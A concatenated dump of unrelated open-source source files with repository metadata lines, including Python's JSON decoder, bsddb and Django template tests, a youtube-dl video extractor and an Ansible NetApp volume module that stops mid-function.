# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'fsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'fs.tex', 'fs Documentation',
'Jun Koda', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'fs', 'fs Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'fs', 'fs Documentation',
author, 'fs', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| gpl-3.0 |
blackzw/openwrt_sdk_dev1 | staging_dir/host/lib/python2.7/json/decoder.py | 65 | 13785 | """Implementation of JSONDecoder
"""
import re
import sys
import struct
from json import scanner
try:
from _json import scanstring as c_scanstring
except ImportError:
c_scanstring = None
__all__ = ['JSONDecoder']
FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL
def _floatconstants():
_BYTES = '7FF80000000000007FF0000000000000'.decode('hex')
if sys.byteorder != 'big':
_BYTES = _BYTES[:8][::-1] + _BYTES[8:][::-1]
nan, inf = struct.unpack('dd', _BYTES)
return nan, inf, -inf
NaN, PosInf, NegInf = _floatconstants()
def linecol(doc, pos):
lineno = doc.count('\n', 0, pos) + 1
if lineno == 1:
colno = pos
else:
colno = pos - doc.rindex('\n', 0, pos)
return lineno, colno
def errmsg(msg, doc, pos, end=None):
# Note that this function is called from _json
lineno, colno = linecol(doc, pos)
if end is None:
fmt = '{0}: line {1} column {2} (char {3})'
return fmt.format(msg, lineno, colno, pos)
#fmt = '%s: line %d column %d (char %d)'
#return fmt % (msg, lineno, colno, pos)
endlineno, endcolno = linecol(doc, end)
fmt = '{0}: line {1} column {2} - line {3} column {4} (char {5} - {6})'
return fmt.format(msg, lineno, colno, endlineno, endcolno, pos, end)
#fmt = '%s: line %d column %d - line %d column %d (char %d - %d)'
#return fmt % (msg, lineno, colno, endlineno, endcolno, pos, end)
_CONSTANTS = {
'-Infinity': NegInf,
'Infinity': PosInf,
'NaN': NaN,
}
STRINGCHUNK = re.compile(r'(.*?)(["\\\x00-\x1f])', FLAGS)
BACKSLASH = {
'"': u'"', '\\': u'\\', '/': u'/',
'b': u'\b', 'f': u'\f', 'n': u'\n', 'r': u'\r', 't': u'\t',
}
DEFAULT_ENCODING = "utf-8"
def py_scanstring(s, end, encoding=None, strict=True,
_b=BACKSLASH, _m=STRINGCHUNK.match):
"""Scan the string s for a JSON string. End is the index of the
character in s after the quote that started the JSON string.
Unescapes all valid JSON string escape sequences and raises ValueError
on attempt to decode an invalid string. If strict is False then literal
control characters are allowed in the string.
Returns a tuple of the decoded string and the index of the character in s
after the end quote."""
if encoding is None:
encoding = DEFAULT_ENCODING
chunks = []
_append = chunks.append
begin = end - 1
while 1:
chunk = _m(s, end)
if chunk is None:
raise ValueError(
errmsg("Unterminated string starting at", s, begin))
end = chunk.end()
content, terminator = chunk.groups()
# Content is contains zero or more unescaped string characters
if content:
if not isinstance(content, unicode):
content = unicode(content, encoding)
_append(content)
# Terminator is the end of string, a literal control character,
# or a backslash denoting that an escape sequence follows
if terminator == '"':
break
elif terminator != '\\':
if strict:
#msg = "Invalid control character %r at" % (terminator,)
msg = "Invalid control character {0!r} at".format(terminator)
raise ValueError(errmsg(msg, s, end))
else:
_append(terminator)
continue
try:
esc = s[end]
except IndexError:
raise ValueError(
errmsg("Unterminated string starting at", s, begin))
# If not a unicode escape sequence, must be in the lookup table
if esc != 'u':
try:
char = _b[esc]
except KeyError:
msg = "Invalid \\escape: " + repr(esc)
raise ValueError(errmsg(msg, s, end))
end += 1
else:
# Unicode escape sequence
esc = s[end + 1:end + 5]
next_end = end + 5
if len(esc) != 4:
msg = "Invalid \\uXXXX escape"
raise ValueError(errmsg(msg, s, end))
uni = int(esc, 16)
# Check for surrogate pair on UCS-4 systems
if 0xd800 <= uni <= 0xdbff and sys.maxunicode > 65535:
msg = "Invalid \\uXXXX\\uXXXX surrogate pair"
if not s[end + 5:end + 7] == '\\u':
raise ValueError(errmsg(msg, s, end))
esc2 = s[end + 7:end + 11]
if len(esc2) != 4:
raise ValueError(errmsg(msg, s, end))
uni2 = int(esc2, 16)
uni = 0x10000 + (((uni - 0xd800) << 10) | (uni2 - 0xdc00))
next_end += 6
char = unichr(uni)
end = next_end
# Append the unescaped character
_append(char)
return u''.join(chunks), end
# Use speedup if available
scanstring = c_scanstring or py_scanstring
WHITESPACE = re.compile(r'[ \t\n\r]*', FLAGS)
WHITESPACE_STR = ' \t\n\r'
def JSONObject(s_and_end, encoding, strict, scan_once, object_hook,
object_pairs_hook, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
s, end = s_and_end
pairs = []
pairs_append = pairs.append
# Use a slice to prevent IndexError from being raised, the following
# check will raise a more specific ValueError if the string is empty
nextchar = s[end:end + 1]
# Normally we expect nextchar == '"'
if nextchar != '"':
if nextchar in _ws:
end = _w(s, end).end()
nextchar = s[end:end + 1]
# Trivial empty object
if nextchar == '}':
if object_pairs_hook is not None:
result = object_pairs_hook(pairs)
return result, end
pairs = {}
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end + 1
elif nextchar != '"':
raise ValueError(errmsg("Expecting property name", s, end))
end += 1
while True:
key, end = scanstring(s, end, encoding, strict)
# To skip some function call overhead we optimize the fast paths where
# the JSON key separator is ": " or just ":".
if s[end:end + 1] != ':':
end = _w(s, end).end()
if s[end:end + 1] != ':':
raise ValueError(errmsg("Expecting : delimiter", s, end))
end += 1
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
try:
value, end = scan_once(s, end)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
pairs_append((key, value))
try:
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar == '}':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting , delimiter", s, end - 1))
try:
nextchar = s[end]
if nextchar in _ws:
end += 1
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar != '"':
raise ValueError(errmsg("Expecting property name", s, end - 1))
if object_pairs_hook is not None:
result = object_pairs_hook(pairs)
return result, end
pairs = dict(pairs)
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end
def JSONArray(s_and_end, scan_once, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
s, end = s_and_end
values = []
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
# Look-ahead for trivial empty array
if nextchar == ']':
return values, end + 1
_append = values.append
while True:
try:
value, end = scan_once(s, end)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
_append(value)
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
end += 1
if nextchar == ']':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting , delimiter", s, end))
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
return values, end
class JSONDecoder(object):
"""Simple JSON <http://json.org> decoder
Performs the following translations in decoding by default:
+---------------+-------------------+
| JSON | Python |
+===============+===================+
| object | dict |
+---------------+-------------------+
| array | list |
+---------------+-------------------+
| string | unicode |
+---------------+-------------------+
| number (int) | int, long |
+---------------+-------------------+
| number (real) | float |
+---------------+-------------------+
| true | True |
+---------------+-------------------+
| false | False |
+---------------+-------------------+
| null | None |
+---------------+-------------------+
It also understands ``NaN``, ``Infinity``, and ``-Infinity`` as
their corresponding ``float`` values, which is outside the JSON spec.
"""
def __init__(self, encoding=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, strict=True,
object_pairs_hook=None):
"""``encoding`` determines the encoding used to interpret any ``str``
objects decoded by this instance (utf-8 by default). It has no
effect when decoding ``unicode`` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as ``unicode``.
``object_hook``, if specified, will be called with the result
of every JSON object decoded and its return value will be used in
place of the given ``dict``. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
``object_pairs_hook``, if specified will be called with the result of
every JSON object decoded with an ordered list of pairs. The return
value of ``object_pairs_hook`` will be used instead of the ``dict``.
This feature can be used to implement custom decoders that rely on the
order that the key and value pairs are decoded (for example,
collections.OrderedDict will remember the order of insertion). If
``object_hook`` is also defined, the ``object_pairs_hook`` takes
priority.
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN.
This can be used to raise an exception if invalid JSON numbers
are encountered.
If ``strict`` is false (true is the default), then control
characters will be allowed inside strings. Control characters in
this context are those with character codes in the 0-31 range,
including ``'\\t'`` (tab), ``'\\n'``, ``'\\r'`` and ``'\\0'``.
"""
self.encoding = encoding
self.object_hook = object_hook
self.object_pairs_hook = object_pairs_hook
self.parse_float = parse_float or float
self.parse_int = parse_int or int
self.parse_constant = parse_constant or _CONSTANTS.__getitem__
self.strict = strict
self.parse_object = JSONObject
self.parse_array = JSONArray
self.parse_string = scanstring
self.scan_once = scanner.make_scanner(self)
def decode(self, s, _w=WHITESPACE.match):
"""Return the Python representation of ``s`` (a ``str`` or ``unicode``
instance containing a JSON document)
"""
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
end = _w(s, end).end()
if end != len(s):
raise ValueError(errmsg("Extra data", s, end, len(s)))
return obj
def raw_decode(self, s, idx=0):
"""Decode a JSON document from ``s`` (a ``str`` or ``unicode``
beginning with a JSON document) and return a 2-tuple of the Python
representation and the index in ``s`` where the document ended.
This can be used to decode a JSON document from a string that may
have extraneous data at the end.
"""
try:
obj, end = self.scan_once(s, idx)
except StopIteration:
raise ValueError("No JSON object could be decoded")
return obj, end
| gpl-2.0 |
vFense/vFenseAgent-nix | agent/deps/rpm6/Python-2.7.5/lib/python2.7/bsddb/test/test_misc.py | 68 | 4803 | """Miscellaneous bsddb module test cases
"""
import os, sys
import unittest
from test_all import db, dbshelve, hashopen, test_support, get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class MiscTestCase(unittest.TestCase):
def setUp(self):
self.filename = get_new_database_path()
self.homeDir = get_new_environment_path()
def tearDown(self):
test_support.unlink(self.filename)
test_support.rmtree(self.homeDir)
def test01_badpointer(self):
dbs = dbshelve.open(self.filename)
dbs.close()
self.assertRaises(db.DBError, dbs.get, "foo")
def test02_db_home(self):
env = db.DBEnv()
# check for crash fixed when db_home is used before open()
self.assertTrue(env.db_home is None)
env.open(self.homeDir, db.DB_CREATE)
if sys.version_info[0] < 3 :
self.assertEqual(self.homeDir, env.db_home)
else :
self.assertEqual(bytes(self.homeDir, "ascii"), env.db_home)
def test03_repr_closed_db(self):
db = hashopen(self.filename)
db.close()
rp = repr(db)
self.assertEqual(rp, "{}")
def test04_repr_db(self) :
db = hashopen(self.filename)
d = {}
for i in xrange(100) :
db[repr(i)] = repr(100*i)
d[repr(i)] = repr(100*i)
db.close()
db = hashopen(self.filename)
rp = repr(db)
self.assertEqual(rp, repr(d))
db.close()
# http://sourceforge.net/tracker/index.php?func=detail&aid=1708868&group_id=13900&atid=313900
#
# See the bug report for details.
#
# The problem was that make_key_dbt() was not allocating a copy of
# string keys but FREE_DBT() was always being told to free it when the
# database was opened with DB_THREAD.
def test05_double_free_make_key_dbt(self):
try:
db1 = db.DB()
db1.open(self.filename, None, db.DB_BTREE,
db.DB_CREATE | db.DB_THREAD)
curs = db1.cursor()
t = curs.get("/foo", db.DB_SET)
# double free happened during exit from DBC_get
finally:
db1.close()
test_support.unlink(self.filename)
def test06_key_with_null_bytes(self):
try:
db1 = db.DB()
db1.open(self.filename, None, db.DB_HASH, db.DB_CREATE)
db1['a'] = 'eh?'
db1['a\x00'] = 'eh zed.'
db1['a\x00a'] = 'eh zed eh?'
db1['aaa'] = 'eh eh eh!'
keys = db1.keys()
keys.sort()
self.assertEqual(['a', 'a\x00', 'a\x00a', 'aaa'], keys)
self.assertEqual(db1['a'], 'eh?')
self.assertEqual(db1['a\x00'], 'eh zed.')
self.assertEqual(db1['a\x00a'], 'eh zed eh?')
self.assertEqual(db1['aaa'], 'eh eh eh!')
finally:
db1.close()
test_support.unlink(self.filename)
def test07_DB_set_flags_persists(self):
try:
db1 = db.DB()
db1.set_flags(db.DB_DUPSORT)
db1.open(self.filename, db.DB_HASH, db.DB_CREATE)
db1['a'] = 'eh'
db1['a'] = 'A'
self.assertEqual([('a', 'A')], db1.items())
db1.put('a', 'Aa')
self.assertEqual([('a', 'A'), ('a', 'Aa')], db1.items())
db1.close()
db1 = db.DB()
# no set_flags call, we're testing that it reads and obeys
# the flags on open.
db1.open(self.filename, db.DB_HASH)
self.assertEqual([('a', 'A'), ('a', 'Aa')], db1.items())
# if it read the flags right this will replace all values
# for key 'a' instead of adding a new one. (as a dict should)
db1['a'] = 'new A'
self.assertEqual([('a', 'new A')], db1.items())
finally:
db1.close()
test_support.unlink(self.filename)
def test08_ExceptionTypes(self) :
self.assertTrue(issubclass(db.DBError, Exception))
for i, j in db.__dict__.items() :
if i.startswith("DB") and i.endswith("Error") :
self.assertTrue(issubclass(j, db.DBError), msg=i)
if i not in ("DBKeyEmptyError", "DBNotFoundError") :
self.assertFalse(issubclass(j, KeyError), msg=i)
# This two exceptions have two bases
self.assertTrue(issubclass(db.DBKeyEmptyError, KeyError))
self.assertTrue(issubclass(db.DBNotFoundError, KeyError))
#----------------------------------------------------------------------
def test_suite():
return unittest.makeSuite(MiscTestCase)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| lgpl-3.0 |
IT-Department-Projects/OOAD-Project | Flask_App/oakcrest/lib/python2.7/site-packages/pip/_vendor/html5lib/treeadapters/genshi.py | 356 | 1555 | from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName, Attrs
from genshi.core import START, END, TEXT, COMMENT, DOCTYPE
def to_genshi(walker):
text = []
for token in walker:
type = token["type"]
if type in ("Characters", "SpaceCharacters"):
text.append(token["data"])
elif text:
yield TEXT, "".join(text), (None, -1, -1)
text = []
if type in ("StartTag", "EmptyTag"):
if token["namespace"]:
name = "{%s}%s" % (token["namespace"], token["name"])
else:
name = token["name"]
attrs = Attrs([(QName("{%s}%s" % attr if attr[0] is not None else attr[1]), value)
for attr, value in token["data"].items()])
yield (START, (QName(name), attrs), (None, -1, -1))
if type == "EmptyTag":
type = "EndTag"
if type == "EndTag":
if token["namespace"]:
name = "{%s}%s" % (token["namespace"], token["name"])
else:
name = token["name"]
yield END, QName(name), (None, -1, -1)
elif type == "Comment":
yield COMMENT, token["data"], (None, -1, -1)
elif type == "Doctype":
yield DOCTYPE, (token["name"], token["publicId"],
token["systemId"]), (None, -1, -1)
else:
pass # FIXME: What to do?
if text:
yield TEXT, "".join(text), (None, -1, -1)
| mit |
jylaxp/django | tests/template_tests/syntax_tests/test_list_index.py | 521 | 2694 | from django.test import SimpleTestCase
from ..utils import setup
class ListIndexTests(SimpleTestCase):
@setup({'list-index01': '{{ var.1 }}'})
def test_list_index01(self):
"""
List-index syntax allows a template to access a certain item of a
subscriptable object.
"""
output = self.engine.render_to_string('list-index01', {'var': ['first item', 'second item']})
self.assertEqual(output, 'second item')
@setup({'list-index02': '{{ var.5 }}'})
def test_list_index02(self):
"""
Fail silently when the list index is out of range.
"""
output = self.engine.render_to_string('list-index02', {'var': ['first item', 'second item']})
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'list-index03': '{{ var.1 }}'})
def test_list_index03(self):
"""
Fail silently when the list index is out of range.
"""
output = self.engine.render_to_string('list-index03', {'var': None})
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'list-index04': '{{ var.1 }}'})
def test_list_index04(self):
"""
Fail silently when variable is a dict without the specified key.
"""
output = self.engine.render_to_string('list-index04', {'var': {}})
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'list-index05': '{{ var.1 }}'})
def test_list_index05(self):
"""
Dictionary lookup wins out when dict's key is a string.
"""
output = self.engine.render_to_string('list-index05', {'var': {'1': "hello"}})
self.assertEqual(output, 'hello')
@setup({'list-index06': '{{ var.1 }}'})
def test_list_index06(self):
"""
But list-index lookup wins out when dict's key is an int, which
behind the scenes is really a dictionary lookup (for a dict)
after converting the key to an int.
"""
output = self.engine.render_to_string('list-index06', {"var": {1: "hello"}})
self.assertEqual(output, 'hello')
@setup({'list-index07': '{{ var.1 }}'})
def test_list_index07(self):
"""
Dictionary lookup wins out when there is a string and int version
of the key.
"""
output = self.engine.render_to_string('list-index07', {"var": {'1': "hello", 1: "world"}})
self.assertEqual(output, 'hello')
| bsd-3-clause |
thedep2/CouchPotatoServer | couchpotato/core/media/movie/providers/trailer/youtube_dl/extractor/moevideo.py | 15 | 3685 | # coding: utf-8
from __future__ import unicode_literals
import json
import re
from .common import InfoExtractor
from ..compat import (
compat_urllib_parse,
compat_urllib_request,
)
from ..utils import (
ExtractorError,
int_or_none,
)
class MoeVideoIE(InfoExtractor):
IE_DESC = 'LetitBit video services: moevideo.net, playreplay.net and videochart.net'
_VALID_URL = r'''(?x)
https?://(?P<host>(?:www\.)?
(?:(?:moevideo|playreplay|videochart)\.net))/
(?:video|framevideo)/(?P<id>[0-9]+\.[0-9A-Za-z]+)'''
_API_URL = 'http://api.letitbit.net/'
_API_KEY = 'tVL0gjqo5'
_TESTS = [
{
'url': 'http://moevideo.net/video/00297.0036103fe3d513ef27915216fd29',
'md5': '129f5ae1f6585d0e9bb4f38e774ffb3a',
'info_dict': {
'id': '00297.0036103fe3d513ef27915216fd29',
'ext': 'flv',
'title': 'Sink cut out machine',
'description': 'md5:f29ff97b663aefa760bf7ca63c8ca8a8',
'thumbnail': 're:^https?://.*\.jpg$',
'width': 540,
'height': 360,
'duration': 179,
'filesize': 17822500,
}
},
{
'url': 'http://playreplay.net/video/77107.7f325710a627383d40540d8e991a',
'md5': '74f0a014d5b661f0f0e2361300d1620e',
'info_dict': {
'id': '77107.7f325710a627383d40540d8e991a',
'ext': 'flv',
'title': 'Operacion Condor.',
'description': 'md5:7e68cb2fcda66833d5081c542491a9a3',
'thumbnail': 're:^https?://.*\.jpg$',
'width': 480,
'height': 296,
'duration': 6027,
'filesize': 588257923,
}
},
]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(
'http://%s/video/%s' % (mobj.group('host'), video_id),
video_id, 'Downloading webpage')
title = self._og_search_title(webpage)
thumbnail = self._og_search_thumbnail(webpage)
description = self._og_search_description(webpage)
r = [
self._API_KEY,
[
'preview/flv_link',
{
'uid': video_id,
},
],
]
r_json = json.dumps(r)
post = compat_urllib_parse.urlencode({'r': r_json})
req = compat_urllib_request.Request(self._API_URL, post)
req.add_header('Content-type', 'application/x-www-form-urlencoded')
response = self._download_json(req, video_id)
if response['status'] != 'OK':
raise ExtractorError(
'%s returned error: %s' % (self.IE_NAME, response['data']),
expected=True
)
item = response['data'][0]
video_url = item['link']
duration = int_or_none(item['length'])
width = int_or_none(item['width'])
height = int_or_none(item['height'])
filesize = int_or_none(item['convert_size'])
formats = [{
'format_id': 'sd',
'http_headers': {'Range': 'bytes=0-'}, # Required to download
'url': video_url,
'width': width,
'height': height,
'filesize': filesize,
}]
return {
'id': video_id,
'title': title,
'thumbnail': thumbnail,
'description': description,
'duration': duration,
'formats': formats,
}
| gpl-3.0 |
romain-dartigues/ansible | lib/ansible/modules/storage/netapp/na_elementsw_volume.py | 7 | 13498 | #!/usr/bin/python
# (c) 2017, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""Element OS Software Volume Manager"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
module: na_elementsw_volume
short_description: NetApp Element Software Manage Volumes
extends_documentation_fragment:
- netapp.solidfire
version_added: '2.7'
author: NetApp Ansible Team (@carchi8py) <[email protected]>
description:
- Create, destroy, or update volumes on ElementSW
options:
state:
description:
- Whether the specified volume should exist or not.
required: true
choices: ['present', 'absent']
name:
description:
- The name of the volume to manage.
- It accepts volume_name or volume_id
required: true
account_id:
description:
- Account ID for the owner of this volume.
- It accepts Account_id or Account_name
required: true
enable512e:
description:
- Required when C(state=present)
- Should the volume provide 512-byte sector emulation?
type: bool
aliases:
- 512emulation
qos:
description: Initial quality of service settings for this volume. Configure as dict in playbooks.
attributes:
description: A YAML dictionary of attributes that you would like to apply on this volume.
size:
description:
- The size of the volume in (size_unit).
- Required when C(state = present).
size_unit:
description:
- The unit used to interpret the size parameter.
choices: ['bytes', 'b', 'kb', 'mb', 'gb', 'tb', 'pb', 'eb', 'zb', 'yb']
default: 'gb'
access:
description:
- Access allowed for the volume.
- readOnly Only read operations are allowed.
- readWrite Reads and writes are allowed.
- locked No reads or writes are allowed.
- replicationTarget Identify a volume as the target volume for a paired set of volumes.
- If the volume is not paired, the access status is locked.
- If unspecified, the access settings of the clone will be the same as the source.
choices: ['readOnly', 'readWrite', 'locked', 'replicationTarget']
password:
description:
- ElementSW access account password
aliases:
- pass
username:
description:
- ElementSW access account user-name
aliases:
- user
'''
EXAMPLES = """
- name: Create Volume
na_elementsw_volume:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: present
name: AnsibleVol
qos: {minIOPS: 1000, maxIOPS: 20000, burstIOPS: 50000}
account_id: 3
enable512e: False
size: 1
size_unit: gb
- name: Update Volume
na_elementsw_volume:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: present
name: AnsibleVol
account_id: 3
access: readWrite
- name: Delete Volume
na_elementsw_volume:
hostname: "{{ elementsw_hostname }}"
username: "{{ elementsw_username }}"
password: "{{ elementsw_password }}"
state: absent
name: AnsibleVol
account_id: 2
"""
RETURN = """
msg:
description: Success message
returned: success
type: string
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
from ansible.module_utils.netapp_elementsw_module import NaElementSWModule
HAS_SF_SDK = netapp_utils.has_sf_sdk()
try:
import solidfire.common
except:
HAS_SF_SDK = False
class ElementOSVolume(object):
"""
Contains methods to parse arguments,
derive details of ElementSW objects
and send requests to ElementOS via
the ElementSW SDK
"""
def __init__(self):
"""
Parse arguments, setup state variables,
check paramenters and ensure SDK is installed
"""
self._size_unit_map = netapp_utils.SF_BYTE_MAP
self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
name=dict(required=True, type='str'),
account_id=dict(required=True),
enable512e=dict(type='bool', aliases=['512emulation']),
qos=dict(required=False, type='dict', default=None),
attributes=dict(required=False, type='dict', default=None),
size=dict(type='int'),
size_unit=dict(default='gb',
choices=['bytes', 'b', 'kb', 'mb', 'gb', 'tb',
'pb', 'eb', 'zb', 'yb'], type='str'),
access=dict(required=False, type='str', default=None, choices=['readOnly', 'readWrite',
'locked', 'replicationTarget']),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
required_if=[
('state', 'present', ['size', 'enable512e'])
],
supports_check_mode=True
)
param = self.module.params
# set up state variables
self.state = param['state']
self.name = param['name']
self.account_id = param['account_id']
self.enable512e = param['enable512e']
self.qos = param['qos']
self.attributes = param['attributes']
self.access = param['access']
self.size_unit = param['size_unit']
if param['size'] is not None:
self.size = param['size'] * self._size_unit_map[self.size_unit]
else:
self.size = None
if HAS_SF_SDK is False:
self.module.fail_json(msg="Unable to import the ElementSW Python SDK")
else:
try:
self.sfe = netapp_utils.create_sf_connection(module=self.module)
except solidfire.common.ApiServerError:
self.module.fail_json(msg="Unable to create the connection")
self.elementsw_helper = NaElementSWModule(self.sfe)
# add telemetry attributes
if self.attributes is not None:
self.attributes.update(self.elementsw_helper.set_element_attributes(source='na_elementsw_volume'))
else:
self.attributes = self.elementsw_helper.set_element_attributes(source='na_elementsw_volume')
def get_account_id(self):
"""
Return account id if found
"""
try:
# Update and return self.account_id
self.account_id = self.elementsw_helper.account_exists(self.account_id)
return self.account_id
except Exception as err:
self.module.fail_json(msg="Error: account_id %s does not exist" % self.account_id, exception=to_native(err))
def get_volume(self):
"""
Return volume details if found
"""
# Get volume details
volume_id = self.elementsw_helper.volume_exists(self.name, self.account_id)
if volume_id is not None:
# Return volume_details
volume_details = self.elementsw_helper.get_volume(volume_id)
if volume_details is not None:
return volume_details
return None
def create_volume(self):
"""
Create Volume
:return: True if created, False if fails
"""
try:
self.sfe.create_volume(name=self.name,
account_id=self.account_id,
total_size=self.size,
enable512e=self.enable512e,
qos=self.qos,
attributes=self.attributes)
except Exception as err:
self.module.fail_json(msg="Error provisioning volume %s of size %s" % (self.name, self.size),
exception=to_native(err))
def delete_volume(self, volume_id):
"""
Delete and purge the volume using volume id
:return: Success : True , Failed : False
"""
try:
self.sfe.delete_volume(volume_id=volume_id)
self.sfe.purge_deleted_volume(volume_id=volume_id)
# Delete method will delete and also purge the volume instead of moving the volume state to inactive.
except Exception as err:
# Throwing the exact error message instead of generic error message
self.module.fail_json(msg=err.message,
exception=to_native(err))
def update_volume(self, volume_id):
"""
Update the volume with the specified param
:return: Success : True, Failed : False
"""
try:
self.sfe.modify_volume(volume_id,
account_id=self.account_id,
access=self.access,
qos=self.qos,
total_size=self.size,
attributes=self.attributes)
except Exception as err:
# Throwing the exact error message instead of generic error message
self.module.fail_json(msg=err.message,
exception=to_native(err))
def apply(self):
# Perform pre-checks, call functions and exit
changed = False
volume_exists = False
update_volume = False
self.get_account_id()
volume_detail = self.get_volume()
if volume_detail:
volume_exists = True
volume_id = volume_detail.volume_id
if self.state == 'absent':
# Checking for state change(s) here, and applying it later in the code allows us to support
# check_mode
changed = True
elif self.state == 'present':
# Checking all the params for update operation
if volume_detail.access is not None and self.access is not None and volume_detail.access != self.access:
update_volume = True
changed = True
elif volume_detail.account_id is not None and self.account_id is not None \
and volume_detail.account_id != self.account_id:
update_volume = True
changed = True
elif volume_detail.qos is not None and self.qos is not None:
"""
Actual volume_detail.qos has ['burst_iops', 'burst_time', 'curve', 'max_iops', 'min_iops'] keys.
As only minOPS, maxOPS, burstOPS is important to consider, checking only these values.
"""
volume_qos = volume_detail.qos.__dict__
if volume_qos['min_iops'] != self.qos['minIOPS'] or volume_qos['max_iops'] != self.qos['maxIOPS'] \
